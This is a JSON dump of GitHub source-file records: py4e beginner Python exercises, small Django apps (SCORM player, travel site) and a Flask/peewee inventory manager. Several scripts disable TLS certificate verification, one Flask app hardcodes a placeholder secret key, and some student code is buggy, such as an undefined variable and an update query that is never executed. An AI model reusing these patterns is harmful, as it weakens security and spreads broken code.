counts.items() :\n hour_list.append((k, v))\n \nhour_list.sort()\n\nfor k,v in hour_list:\n print(k, v)\n \n"
},
{
"alpha_fraction": 0.7064067125320435,
"alphanum_fraction": 0.7259052991867065,
"avg_line_length": 42.56097412109375,
"blob_id": "cd183381faa343402ff866b3e3c59046a3fd9d14",
"content_id": "eeb0794af0e80609b80b4458776bbc98ffedc5e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1795,
"license_type": "no_license",
"max_line_length": 306,
"num_lines": 41,
"path": "/12.6.test.py",
"repo_name": "andreus42/py4e",
"src_encoding": "UTF-8",
"text": "'''\nWelcome Andrew S Metell from Using Python to Access Web Data\n\nScraping Numbers from HTML using BeautifulSoup In this assignment you will write a Python program similar to http://www.py4e.com/code3/urllink2.py. The program will use urllib to read the HTML from the data files below, and parse the data, extracting numbers and compute the sum of the numbers in the file.\n\nWe provide two files for this assignment. One is a sample file where we give you the sum for your testing and the other is the actual data you need to process for the assignment.\n\nSample data: http://py4e-data.dr-chuck.net/comments_42.html (Sum=2553)\nActual data: http://py4e-data.dr-chuck.net/comments_100091.html (Sum ends with 44)\nYou do not need to save these files to your folder since your program will read the data directly from the URL. Note: Each student will have a distinct data url for the assignment - so only use your own data url for analysis.\n'''\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport ssl\nimport re\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\n# url = input('Enter - ')\nurl = ' http://py4e-data.dr-chuck.net/comments_42.xml'\n# url = 'http://py4e-data.dr-chuck.net/comments_100091.html'\nhtml = urlopen(url, context=ctx).read()\nsoup = BeautifulSoup(xml, \"xml.parser\")\n\nsum = 0\n# Retrieve all of the span tags\ntags = soup('comments')\nfor tag in tags:\n # Look at the parts of a tag\n # print('TAG:', tag)\n # print('URL:', tag.get('href', None))\n # print('Contents:', tag.contents[0])\n # print('Attrs:', tag.attrs)\n #use regex to grab number string, turn to in, add to sum\n nums = re.findall('[0-9]+', tag.contents[0])\n for each in nums :\n sum = sum + int(each)\n print('Sum', sum)\n \n "
},
{
"alpha_fraction": 0.7318037748336792,
"alphanum_fraction": 0.7401107549667358,
"avg_line_length": 44.98181915283203,
"blob_id": "c915f4339647f0c35b59e3a966f6b32c698cf698",
"content_id": "19284f7865d25b11732703eec8391d78cf1b5bd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2528,
"license_type": "no_license",
"max_line_length": 431,
"num_lines": 55,
"path": "/_site/12.7.py",
"repo_name": "andreus42/py4e",
"src_encoding": "UTF-8",
"text": "'''\nFollowing Links in Python\n\nIn this assignment you will write a Python program that expands on http://www.py4e.com/code3/urllinks.py. The program will use urllib to read the HTML from the data files below, extract the href= vaues from the anchor tags, scan for a tag that is in a particular position relative to the first name in the list, follow that link and repeat the process a number of times and report the last name you find.\n\nWe provide two files for this assignment. One is a sample file where we give you the name for your testing and the other is the actual data you need to process for the assignment\n\nSample problem: Start at http://py4e-data.dr-chuck.net/known_by_Fikret.html \nFind the link at position 3 (the first name is 1). Follow that link. Repeat this process 4 times. The answer is the last name that you retrieve.\nSequence of names: Fikret Montgomery Mhairade Butchi Anayah \nLast name in sequence: Anayah\nActual problem: Start at: http://py4e-data.dr-chuck.net/known_by_Daymian.html \nFind the link at position 18 (the first name is 1). Follow that link. Repeat this process 7 times. The answer is the last name that you retrieve.\nHint: The first character of the name of the last page that you will load is: M\nStrategy\nThe web pages tweak the height between the links and hide the page after a few seconds to make it difficult for you to do the assignment without writing a Python program. But frankly with a little effort and patience you can overcome these attempts to make it a little harder to complete the assignment without writing a Python program. But that is not the point. The point is to write a clever Python program to solve the program.\n'''\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport ssl\nimport re\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nurl = input('Enter URL: ')\ncount = int(input('Enter count: '))\nposition = int(input('Enter position: '))\n\n# url = 'http://py4e-data.dr-chuck.net/known_by_Daymian.html'\n# count = 7\n# position = 18\nrep = 0\n\n# Loop based on count\nfor x in range(0, count) :\n html = urlopen(url, context=ctx).read()\n soup = BeautifulSoup(html, \"html.parser\")\n print('Retrieving', url)\n count = 0\n # Retrieve all of the anchor tags\n tags = soup('a')\n # Loop based on position\n for tag in tags :\n this_tag = tag.get('href', None)\n rep += 1\n # Set new url to href in position\n if rep == position :\n url = this_tag\n rep = 0\n break\n \nprint('Retrieving', url)"
},
{
"alpha_fraction": 0.7082018852233887,
"alphanum_fraction": 0.7255520224571228,
"avg_line_length": 29.095237731933594,
"blob_id": "76333de3672b31112f82677bb44cf1ee6c240437",
"content_id": "e5d2c644a011372b97faddb83754ebbb66648298",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 634,
"license_type": "no_license",
"max_line_length": 224,
"num_lines": 21,
"path": "/_site/11.3.py",
"repo_name": "andreus42/py4e",
"src_encoding": "UTF-8",
"text": "'''\nFinding Numbers in a Haystack\n\nIn this assignment you will read through and parse a file with text and numbers. You will extract all the numbers in the file and compute the sum of the numbers.\n\nHandling The Data\nThe basic outline of this problem is to read the file, look for integers using the re.findall(), looking for a regular expression of '[0-9]+' and then converting the extracted strings to integers and summing up the integers.\n'''\n\nimport re\n\nname = 'regex_sum_100089.txt'\nhandle = open(name)\n\nsum = 0\nfor line in handle :\n nums = re.findall('[0-9]+', line)\n for each in nums :\n sum = sum + int(each)\n\nprint(sum)\n "
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5735294222831726,
"avg_line_length": 16.125,
"blob_id": "9d57691999518ba53e303384590b39960757ec55",
"content_id": "6033b7732ac92ff60c8d6fb94d3175299f66e544",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 136,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 8,
"path": "/3.1.py",
"repo_name": "andreus42/py4e",
"src_encoding": "UTF-8",
"text": "hrs = input(\"Enter Hours: \")\nh = float(hrs)\nr = float(input(\"Enter rate: \"))\n\nif h <= 40:\n\tprint(40*r)\nelse:\n\tprint(40*r + (h-40)*r*1.5)"
},
{
"alpha_fraction": 0.6018518805503845,
"alphanum_fraction": 0.6203703880310059,
"avg_line_length": 14.571428298950195,
"blob_id": "42bbb8a6031f962b6347a3d5c4ea893ea2eea2b6",
"content_id": "13cd41a2ff538c17d4d896ef88a4a93140f4ee7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 108,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 7,
"path": "/test.py",
"repo_name": "andreus42/py4e",
"src_encoding": "UTF-8",
"text": "fhand = open('mbox.txt', \"r\")\ncount = 0\n\nfor line in fhand:\n count = count + 1\n\nprint('Line Count:', count)"
},
{
"alpha_fraction": 0.7209756374359131,
"alphanum_fraction": 0.7268292903900146,
"avg_line_length": 38.46154022216797,
"blob_id": "8c9e0cf46241948a7ad2f35aba2c98795335efa9",
"content_id": "398b30a71c57815023dfb91796a1f6187f53dcde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1025,
"license_type": "no_license",
"max_line_length": 502,
"num_lines": 26,
"path": "/9.4.py",
"repo_name": "andreus42/py4e",
"src_encoding": "UTF-8",
"text": "'''\n9.4 Write a program to read through the mbox-short.txt and figure out who has the sent the greatest number of mail messages. The program looks for 'From ' lines and takes the second word of those lines as the person who sent the mail. The program creates a Python dictionary that maps the sender's mail address to a count of the number of times they appear in the file. After the dictionary is produced, the program reads through the dictionary using a maximum loop to find the most prolific committer.\n'''\n\nname = input(\"Enter file:\")\nif len(name) < 1 : name = \"mbox-short.txt\"\n#name = \"mbox-short.txt\"\n\nhandle = open(name)\ncounts = dict()\n\nfor line in handle:\n if not line.startswith(\"From \") : continue\n current = (line.rstrip()).split()\n email = (current[1])\n counts[email] = counts.get(email, 0) + 1\n\ntop_emailer = None\nemail_count = None\n\nfor emailer, emails in counts.items():\n if top_emailer is None or emails > email_count:\n top_emailer = emailer\n email_count = emails\n\nprint(top_emailer, email_count)"
}
] | 7 |
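The py4e entries above (the BeautifulSoup exercise and 11.3.py) lean on a single idiom: re.findall('[0-9]+', text) returns every digit run as a string, each of which is cast to int and summed. A minimal, self-contained sketch of that idiom — the sample string below is invented for illustration, not assignment data:

import re

text = 'scores: 12, 7 and 30'  # hypothetical input
# findall returns ['12', '7', '30']; cast each run to int and sum
total = sum(int(n) for n in re.findall('[0-9]+', text))
print(total)  # 49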
sureshmariadass/scorm | https://github.com/sureshmariadass/scorm | 407e55aeff0faabe7aae4a64bb921c84eadb0940 | b04e6df88dee0f402ea3809b51e6db8649e4db59 | 17ffe2a771d5f948faecf909c6976e8b6273c6d4 | refs/heads/master | 2020-05-26T12:13:11.129549 | 2019-05-23T12:27:52 | 2019-05-23T12:27:52 | 188,227,849 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7731958627700806,
"alphanum_fraction": 0.7731958627700806,
"avg_line_length": 18.399999618530273,
"blob_id": "418108ab71083ba56bbacf86d5467e49e1c43684",
"content_id": "6ea1422377196898e16cbc7cec241a3ee50715c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 97,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 5,
"path": "/scormplayer/apps.py",
"repo_name": "sureshmariadass/scorm",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass ScormplayerConfig(AppConfig):\n name = 'scormplayer'\n"
},
{
"alpha_fraction": 0.744027316570282,
"alphanum_fraction": 0.7508532404899597,
"avg_line_length": 28.299999237060547,
"blob_id": "74d0f5f04fdaa8d502bb6ac987ab8146597583d6",
"content_id": "dcda7c689b069133710bed34337bf7406577cb6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 293,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 10,
"path": "/scormplayer/views.py",
"repo_name": "sureshmariadass/scorm",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\nfrom django.shortcuts import render,redirect\n# Create your views here.\ndef index(request):\n return render(request,'index.html')\ndef index2(request):\n return render(request,'index2.html')\ndef apihtml(request):\n return render(request,'api.html')\n"
},
{
"alpha_fraction": 0.8048780560493469,
"alphanum_fraction": 0.8048780560493469,
"avg_line_length": 19.5,
"blob_id": "ed35cd6a3d0d1b23f3f99f1a30a64669427f77e0",
"content_id": "eb90fa7f970f2f937719791635924037c126372e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 41,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 2,
"path": "/README.md",
"repo_name": "sureshmariadass/scorm",
"src_encoding": "UTF-8",
"text": "# scorm\nsimple scorm player using django\n"
}
] | 3 |
EjuluWilson/Django-Travello-WebApp | https://github.com/EjuluWilson/Django-Travello-WebApp | bbb80a2a523203929d89390c4f03c0ce5d8e2840 | d27dcb3ff0fe26410d7390849ecc27021c7367e3 | 0254bfcb1fc5a9219252bd74c2b7123d0ea1ad9c | refs/heads/master | 2021-05-23T12:00:04.131214 | 2020-04-05T16:28:57 | 2020-04-05T16:28:57 | 253,276,167 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6848000288009644,
"alphanum_fraction": 0.7167999744415283,
"avg_line_length": 37.9375,
"blob_id": "2f0945ee3900cc4c52cd60e7b3a9607bca1da8da",
"content_id": "ec923cffa5f0202d070151b0b16aa9fd6951a63a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 625,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 16,
"path": "/travello/views.py",
"repo_name": "EjuluWilson/Django-Travello-WebApp",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom .models import Destination\n\n#Create your views here.\ndest1 = Destination(\"Atutur\",\"my birth place\",\"500k\",\"destination_2.jpg\",True)\ndest2 = Destination(\"Bukedea\",\"cool place\",\"700k\",\"destination_6.jpg\")\ndest3 = Destination(\"Kumi\",\"try it out\",\"800k\",\"destination_4.jpg\")\n\ndests = [dest1,dest2,dest3] #object array\n\ndef launch_travello(request):\n\n #pass the destination object to the HTML\n return render(request,\"index.html\",{\"dests\":dests})\n #You will thereafter be able to call these objects using {{}} in the HTML\n #call example: {{dests.0.name}} == dests.dest1.name\n\n\n"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.6428571343421936,
"avg_line_length": 12.033333778381348,
"blob_id": "72f668212304eb207b29728a4dbb22f3fe06aa20",
"content_id": "77738d3db2bb7e0e0902311c3dd9f2f4b407d200",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 392,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 30,
"path": "/travello/models.py",
"repo_name": "EjuluWilson/Django-Travello-WebApp",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n# Create your models here.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#This models.py is ment for database access hoever yo can also retrive data from python code\n\nclass Destination:\n\n def __init__(self,name,description,price,image,offer = False):\n self.name = name\n self.img = image\n self.desc = description\n self.price = price\n self.offer = offer\n\n"
},
{
"alpha_fraction": 0.6325300931930542,
"alphanum_fraction": 0.6325300931930542,
"avg_line_length": 19.875,
"blob_id": "192221a9d6f820b2b99b9b66dd4b4ddbe66c9e4f",
"content_id": "4fc9b4925f5f75a3c33caa085594d9ec4dda3802",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 166,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 8,
"path": "/calc/urls.py",
"repo_name": "EjuluWilson/Django-Travello-WebApp",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home,name=\"HOME\"),\n path('sum', views.add),\n path('to_calc', views.calc),\n]"
},
{
"alpha_fraction": 0.705050528049469,
"alphanum_fraction": 0.7090908885002136,
"avg_line_length": 28.117647171020508,
"blob_id": "ff6a8243ccd52e2485bac396094308f817ce92bc",
"content_id": "c63d22ab186c914e0c86058592a011bcb6a01cc9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 495,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 17,
"path": "/calc/views.py",
"repo_name": "EjuluWilson/Django-Travello-WebApp",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\ndef home(request): \n return render(request,\"home.html\") #launch the home.html template\n\n# this functio requests/launches/calls the input.html template\ndef calc(request):\n return render(request,\"inputs.html\")\n\n\n#function returns a sum on the the template results.thml\ndef add(request):\n x = request.POST[\"num1\"]\n y = request.POST[\"num2\"]\n sum = int(x)+int(y)\n #seend to results.html\n return render(request,\"results.html\",{\"result\":sum})\n"
}
] | 4 |
celestialbunny/10_inventory_management | https://github.com/celestialbunny/10_inventory_management | 24c72a167f4b18aa0d9cc07b4eb2eaa2535a2110 | a2f9ed809e3b25b6b6de12d3f641ef45775fc5aa | 8e538741e77dee464de63b1838f8f1d1de238c70 | refs/heads/master | 2022-12-23T01:35:50.512355 | 2019-02-19T06:32:57 | 2019-02-19T06:32:57 | 171,193,823 | 0 | 0 | null | 2019-02-18T01:23:54 | 2019-02-19T06:33:10 | 2022-12-08T01:37:13 | HTML |
[
{
"alpha_fraction": 0.7736625671386719,
"alphanum_fraction": 0.7736625671386719,
"avg_line_length": 17.769229888916016,
"blob_id": "8183816813a832c84f96eba717f9a57aa319a5cf",
"content_id": "555417432e655f61f171f69d5dae9c06454170db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 13,
"path": "/forms.py",
"repo_name": "celestialbunny/10_inventory_management",
"src_encoding": "UTF-8",
"text": "from wtforms import Form\nfrom wtforms.fields import StringField\nfrom wtforms.validators import DataRequired\n\nfrom models import Store\n\nclass RegisterStore(Form):\n\tstore_name = StringField(\n\t\t'Storename',\n\t\tvalidators=[\n\t\t\tDataRequired()\n\t\t]\n\t)"
},
{
"alpha_fraction": 0.6987179517745972,
"alphanum_fraction": 0.7008547186851501,
"avg_line_length": 30.509614944458008,
"blob_id": "a40c1b11fea89303657f6da0a568af1b98e2e1af",
"content_id": "9bb6ad839390b06bab340044155f11deab24b146",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3276,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 104,
"path": "/server.py",
"repo_name": "celestialbunny/10_inventory_management",
"src_encoding": "UTF-8",
"text": "import peeweedbevolve\nfrom flask import (Flask, render_template, request, flash, redirect, url_for)\nfrom models import db, Store, Warehouse, Product\nfrom peewee import *\n\n# python -c 'import os; print(os.urandom(16))'\n# b'_5#y2L\"F4Q8z\\n\\xec]/\n\napp = Flask(__name__)\napp.secret_key = 'secret_key!'\n\[email protected]_request\ndef before_request():\n\tdb.connect()\n\[email protected]_request\ndef after_request(response):\n\tdb.close()\n\treturn response\n\[email protected]()\ndef migrate():\n\tdb.evolve(ignore_tables={'base_model'})\n\n'''\nStart of the own declared directory\n'''\n\[email protected](\"/\")\ndef index():\n\treturn render_template('index.html')\n\[email protected](\"/contact\")\ndef contact():\n\treturn render_template('contact.html')\n\[email protected](\"/store\", methods=['GET', 'POST'])\ndef store():\n\t# form = forms.Store()\n\t# store_list = Store.select()\n\tstore_list = Store.select()\n\tpayload = []\n\tfor store in store_list:\n\t\tnew_object = {\n\t\t\t\"store_name\": store.name,\n\t\t\t\"num\": len(list(store.warehouses))\n\t\t}\n\t\tpayload.append(new_object)\n\tif request.method == 'POST':\n\t\t# How to post a success message from form submission if not using flash but using bootstrap under 'store.html' line 5\n\t\t# breakpoint()\n\t\tnew_store = Store(name=request.form['store_name'])\n\t\tnew_store.save()\n\t\tflash(\"Store created\", \"success\")\n\t\treturn redirect(url_for('store'), store_list)\n\telse:\n\t\treturn render_template('store.html', payload=payload)\n\[email protected](\"/store/<int:store_number>\", methods=['GET', 'POST'])\ndef store_info(store_number):\n\tif request.method == 'POST':\n\t\tnew_store_name = request.form['new_store_name']\n\t\tStore.update({Store.name: new_store_name}).where(Store.id == store_number)\n\t\treturn redirect(url_for('store/index'))\n\telse:\n\t\tstore_id = Store.select().where(Store.id == store_number)\n\t\tnum_of_wh = True\n\t\tfor store in store_id:\n\t\t\tnum_of_wh = len(list(store.warehouses))\n\t\treturn render_template('store_page.html', store_id=store_id, num_of_wh=num_of_wh)\n\[email protected](\"/warehouse\", methods=['GET', 'POST'])\ndef warehouse():\n\tif request.method == 'POST':\n\t\tstore = request.form['store_list']\n\t\tlocation = request.form['warehouse_location']\n\t\tnew_warehouse = Warehouse.create(location=location, store=store)\n\t\tnew_warehouse.save()\n\t\tflash(\"Warehouse created\", \"success\")\n\t\treturn redirect(url_for('warehouse'))\n\telse:\n\t\t# result = Store.select(Store.name, fn.COUNT(Warehouse.store.id == Store.id)).join(Warehouse).group_by(Store.name).where(Store.id == Warehouse.store.id)\n\t\twarehouse_list = Warehouse.select()\n\t\tstore_list = Store.select()\n\t\treturn render_template('warehouse.html', warehouse_list=warehouse_list, store_list=store_list)\n\[email protected](\"/product\", methods=['GET', 'POST'])\ndef product():\n\tif request.method == 'POST':\n\t\tname = request.form['product_name']\n\t\tdescription = request.form['product_description']\n\t\twarehouse = request.form['warehouse_list']\n\t\tcolor = request.form['product_color']\n\t\tnew_product = Product(name=name, description=description, warehouse=warehouse, color=color)\n\t\tnew_product.save()\n\t\tflash(\"Product created\", \"success\")\n\t\treturn redirect(url_for('product'))\n\telse:\n\t\tproduct_list = Product.select()\n\t\twarehouse_list = Warehouse.select()\n\t\treturn render_template('product.html', warehouse_list=warehouse_list, product_list=product_list)\n\nif __name__ == 
'__main__':\n\tapp.run()"
},
{
"alpha_fraction": 0.507196307182312,
"alphanum_fraction": 0.6986182928085327,
"avg_line_length": 16.02941131591797,
"blob_id": "9fe73c32150738604aac3af2382ed3923106be42",
"content_id": "1d822dd610270183d60031f85605fe526604bce2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 3474,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 204,
"path": "/requirements.txt",
"repo_name": "celestialbunny/10_inventory_management",
"src_encoding": "UTF-8",
"text": "alabaster==0.7.12\nanaconda-client==1.7.2\nanaconda-navigator==1.9.6\nanaconda-project==0.8.2\nasn1crypto==0.24.0\nastroid==2.1.0\nastropy==3.1.1\natomicwrites==1.3.0\nattrs==18.2.0\nBabel==2.6.0\nbackcall==0.1.0\nbackports.os==0.1.1\nbackports.shutil-get-terminal-size==1.0.0\nbcrypt==3.1.6\nbeautifulsoup4==4.7.1\nbitarray==0.8.3\nbkcharts==0.2\nblaze==0.11.3\nbleach==3.1.0\nbokeh==1.0.4\nboto==2.49.0\nBottleneck==1.2.1\ncertifi==2018.11.29\ncffi==1.11.5\nchardet==3.0.4\nClick==7.0\ncloudpickle==0.8.0\nclyent==1.2.2\ncolorama==0.4.1\ncomtypes==1.1.7\nconda==4.5.12\nconda-build==3.17.6\nconda-verify==3.1.1\ncontextlib2==0.5.5\ncryptography==2.4.2\ncycler==0.10.0\nCython==0.29.5\ncytoolz==0.9.0.1\ndask==1.1.1\ndatashape==0.5.4\ndecorator==4.3.2\ndefusedxml==0.5.0\ndistributed==1.25.3\ndocutils==0.14\nentrypoints==0.2.3\net-xmlfile==1.0.1\nfastcache==1.0.2\nfilelock==3.0.10\nFlask==1.0.2\nFlask-Bcrypt==0.7.1\nFlask-Cors==3.0.7\nFlask-Login==0.4.1\nfuture==0.17.1\ngevent==1.4.0\nglob2==0.6\ngreenlet==0.4.15\nh5py==2.9.0\nheapdict==1.0.0\nhtml5lib==1.0.1\nidna==2.8\nimageio==2.4.1\nimagesize==1.1.0\nimportlib-metadata==0.8\nipykernel==5.1.0\nipython==7.2.0\nipython-genutils==0.2.0\nipywidgets==7.4.2\nisort==4.3.4\nitsdangerous==1.1.0\njdcal==1.4\njedi==0.13.2\nJinja2==2.10\njsonschema==2.6.0\njupyter==1.0.0\njupyter-client==5.2.4\njupyter-console==6.0.0\njupyter-core==4.4.0\njupyterlab==0.35.4\njupyterlab-server==0.3.0\nkeyring==18.0.0\nkiwisolver==1.0.1\nlazy-object-proxy==1.3.1\nlibarchive-c==2.8\nllvmlite==0.26.0\nlocket==0.2.0\nlxml==4.3.1\nMarkupSafe==1.1.0\nmatplotlib==3.0.2\nmccabe==0.6.1\nmenuinst==1.4.14\nmistune==0.8.4\nmkl-fft==1.0.6\nmkl-random==1.0.2\nmore-itertools==6.0.0\nmpmath==1.1.0\nmsgpack==0.6.1\nmultipledispatch==0.6.0\nnavigator-updater==0.2.1\nnbconvert==5.4.1\nnbformat==4.4.0\nnetworkx==2.2\nnltk==3.4\nnose==1.3.7\nnotebook==5.7.4\nnumba==0.41.0\nnumexpr==2.6.9\nnumpy==1.16.1\nnumpydoc==0.8.0\nodo==0.5.1\nolefile==0.46\nopenpyxl==2.6.0\npackaging==19.0\npandas==0.24.1\npandocfilters==1.4.2\nparso==0.3.4\npartd==0.3.9\npath.py==11.5.0\npathlib2==2.3.3\npatsy==0.5.1\npeewee==3.8.2\npep8==1.7.1\npickleshare==0.7.5\nPillow==5.4.1\npkginfo==1.5.0.1\npluggy==0.8.1\nply==3.11\npostgres==2.2.2\nprometheus-client==0.5.0\nprompt-toolkit==2.0.8\npsutil==5.5.1\npsycopg2-binary==2.7.7\npy==1.7.0\npycodestyle==2.5.0\npycosat==0.6.3\npycparser==2.19\npycrypto==2.6.1\npycurl==7.43.0.2\npyflakes==2.1.0\nPygments==2.3.1\npylint==2.2.2\npyodbc==4.0.25\npyOpenSSL==19.0.0\npyparsing==2.3.1\nPySocks==1.6.8\npytest==4.2.1\npytest-arraydiff==0.3\npytest-astropy==0.5.0\npytest-doctestplus==0.2.0\npytest-openfiles==0.3.2\npytest-remotedata==0.3.1\npython-dateutil==2.8.0\npytz==2018.9\nPyWavelets==1.0.1\npywin32==223\npywinpty==0.5.5\nPyYAML==3.13\npyzmq==17.1.2\nQtAwesome==0.5.6\nqtconsole==4.4.3\nQtPy==1.6.0\nrequests==2.21.0\nrope==0.12.0\nruamel-yaml==0.15.46\nscikit-image==0.14.2\nscikit-learn==0.20.2\nscipy==1.2.1\nseaborn==0.9.0\nSend2Trash==1.5.0\nsimplegeneric==0.8.1\nsingledispatch==3.4.0.3\nsix==1.12.0\nsnowballstemmer==1.2.1\nsortedcollections==1.1.2\nsortedcontainers==2.1.0\nSphinx==1.8.4\nsphinxcontrib-websupport==1.1.0\nspyder==3.3.3\nspyder-kernels==1.3.2\nSQLAlchemy==1.2.18\nstatsmodels==0.9.0\nsympy==1.3\ntables==3.4.4\ntblib==1.3.2\nterminado==0.8.1\ntestpath==0.4.2\ntoolz==0.9.0\ntornado==5.1.1\ntqdm==4.31.1\ntraitlets==4.3.2\nunicodecsv==0.14.1\nurllib3==1.24.1\nwcwidth==0.1.7\nwebencodings==0.5.1\nWerkzeug==0.14.1\nwidgetsnbextension==3.4.2\nwin-inet-pton==1.0.1\nwin
-unicode-console==0.5\nwincertstore==0.2\nwrapt==1.11.1\nxlrd==1.2.0\nXlsxWriter==1.1.4\nxlwings==0.15.2\nxlwt==1.3.0\nzict==0.1.3\n"
},
{
"alpha_fraction": 0.6346749067306519,
"alphanum_fraction": 0.6359133124351501,
"avg_line_length": 28.925926208496094,
"blob_id": "506ac6735bc79af3347ed69f4e43f17e32080675",
"content_id": "bc4b6ec7755a0db3c0d44aba2f1c8311e2bb59b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1615,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 54,
"path": "/templates/warehouse.html",
"repo_name": "celestialbunny/10_inventory_management",
"src_encoding": "UTF-8",
"text": "{% extends \"_layout.html\" %}\n\n{% block content %}\n<!-- lookout for get_flashed_messages(), every flashed messsage will be saved here -->\n\n{% with messages = get_flashed_messages() %}\n{% if messages %}\n<div class=\"alert alert-success alert-dismissible fade show\" role=\"alert\">\n\t<strong>Warehouse created!</strong>\n\t<button type=\"button\" class=\"close\" data-dismiss=\"alert\" aria-label=\"Close\">\n\t\t<span aria-hidden=\"true\">×</span>\n\t</button>\n</div>\n{% endif %}\n{% endwith %}\n\n<h1>Warehouses</h1>\n<table class=\"table\">\n\t<thead>\n\t\t<tr>\n\t\t\t<th scope=\"col\">Warehouse Store</th>\n\t\t\t<th scope=\"col\">Warehouse Location</th>\n\t\t</tr>\n\t</thead>\n\t<tbody>\n\t\t{% if warehouse_list %}\n\t\t\t{% for warehouse in warehouse_list %}\n\t\t\t\t<tr>\n\t\t\t\t\t<td>{{ warehouse.store_id }}</td>\n\t\t\t\t\t<td>{{ warehouse.location }}</td>\n\t\t\t\t</tr>\n\t\t\t{% endfor %}\n\t\t{% else %}\n\t\t{% endif %}\n\t</tbody>\n</table>\n\n<form action=\"{{ url_for('warehouse') }}\" method=\"POST\">\n\t<div class=\"form-group\">\n\t\t<label for=\"warehouse_location\">Name of warehouse:</label>\n\t\t<input type=\"text\" class=\"form-control\" name=\"warehouse_location\" id=\"warehouse_location\" placeholder=\"Name of warehouse to be created\">\n\t</div>\n\t<div class=\"form-group\">\n\t\t<label for=\"store_list\">Location of warehouse:</label>\n\t\t<select name=\"store_list\" id=\"store_list\">\n\t\t\t<option disabled selected value> -- Select available store -- </option>\n\t\t\t{% for store in store_list %}\n\t\t\t\t<option name=\"store_id\" value=\"{{ store.id }}\">{{ store.name }} - {{ store.id }}</option>\n\t\t\t{% endfor %}\n\t\t</select>\n\t</div>\n\t<button type=\"submit\" class=\"btn btn-primary\">Submit</button>\n</form>\n{% endblock %}"
}
] | 4 |
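server.py above mixes two peewee write styles: instantiating a model and calling .save(), versus building an UPDATE query, which runs nothing until .execute() is called (the fix applied in store_info). A minimal sketch against an in-memory SQLite database — the model and values here are invented for illustration, not taken from the repo's models.py:

from peewee import Model, CharField, SqliteDatabase

db = SqliteDatabase(':memory:')

class Store(Model):
    name = CharField()
    class Meta:
        database = db

db.connect()
db.create_tables([Store])

s = Store(name='demo')  # style 1: instance plus save()
s.save()
# style 2: query objects are lazy; .execute() actually issues the UPDATE
Store.update({Store.name: 'renamed'}).where(Store.id == s.id).execute()
print(Store.get_by_id(s.id).name)  # renamed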
darkerego/py_password_ssl_shells | https://github.com/darkerego/py_password_ssl_shells | 360840940b9f98a0b6d79a19758ca24cc719fd72 | 809fb88e7c71dd2ab34f543edc14140875284ba2 | 4e12882cdf9a1fa191aa48f4588c64d21f02bedf | refs/heads/master | 2020-09-01T17:06:14.746773 | 2019-11-01T15:30:32 | 2019-11-01T15:30:32 | 219,012,064 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5566655397415161,
"alphanum_fraction": 0.5711333155632019,
"avg_line_length": 27.460784912109375,
"blob_id": "424cf7765e48f54d72074b78de9d1e24b345b683",
"content_id": "1370e74c4a83497b3a990edcd5d3121774f11200",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2903,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 102,
"path": "/reverse/server.py",
"repo_name": "darkerego/py_password_ssl_shells",
"src_encoding": "UTF-8",
